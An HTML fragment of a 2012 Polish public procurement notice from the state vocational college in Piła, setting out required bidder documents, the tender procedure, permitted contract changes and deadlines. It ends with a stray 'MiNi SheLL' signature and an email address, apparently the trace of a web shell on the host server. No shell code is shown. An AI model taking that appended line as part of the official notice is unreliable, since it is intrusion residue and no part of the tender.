<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz ofertowy (załącznik nr 1, Część II SIWZ). Pełnomocnictwo dla reprezentanta - dotyczy podmiotów występujących wspólnie (np. konsorcja i spółki cywilne).  Parafowany projekt umowy. Kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, dotyczących: 
1) terminu zakończenia przedmiotu zamówienia - ustalony termin w umowie może ulec zmianie w przypadku wystąpienia jednej z niżej wymienionych okoliczności pod warunkiem, że ma ona wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z: 
a) przestojów i opóźnień zawinionych przez Zamawiającego, 
b) działania siły wyższej, w rozumieniu przepisów Kodeksu cywilnego
c) obiektywnych warunków klimatyczno-atmosferycznych uniemożliwiających lub utrudniających wykonywanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru, 
d) konieczności wprowadzenia zmian w dokumentacji projektowej i oczekiwaniem na wprowadzenie przez projektanta korekt i uściśleń w rozwiązaniach projektowych 
e) ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody w gruncie, 
f) ujawnienia w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód formalno-prawnych, 
g) realizacji robót dodatkowych, zamiennych lub zaniechania części robót.
h) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub - opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów
2) zakresu i wartości umowy; może być spowodowany wystąpieniem robót zamiennych lub zaniechanych:
a)  wprowadzenie robót zamiennych jest możliwe, jeśli: 
- jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki w trakcie eksploatacji przedmiotu umowy,
- stało się konieczne na skutek ujawnienia przeszkód w gruncie lub błędów w dokumentacji projektowej, 
- pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych w dokumentacji projektowej, 
- dotyczą zastosowania nowych technologii nieznanych zamawiającemu i niedostępnych w momencie zawarcia umowy,
b) wprowadzenie robót zaniechanych jest możliwe, jeśli: 
- są następstwem zleconych robót dodatkowych, 
- konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy,
- zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
3) zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia; w przypadku wystąpienia konieczności zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia strony mają prawo do wprowadzenia tej zmiany w umowie, pod warunkiem, że nowe osoby będą spełniały warunki, jakie określił Zamawiający,
4) zmiany osób reprezentujących strony umowy; w przypadku zmian osób uprawnionych do reprezentowania Zamawiającego lub Wykonawcy strony dokonają stosownych zmian w umowie,
5) w okolicznościach, o których mowa w pkt 1) strony ustalają nowe terminy umowne, z tym, że wielkość zmian musi być powiązana z przyczyną, jaka ją spowodowała. 
6) wydłużenie terminu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości zabezpieczenia i jego wymaganej wysokości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Stanisława Staszica w Pile, ul. Podchorążych 10, 64-920 Piła, budynek A, pok. 115..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2012 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Stanisława Staszica w Pile, ul. Podchorążych 10, 64-920 Piła, budynek A, pok. 119, kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com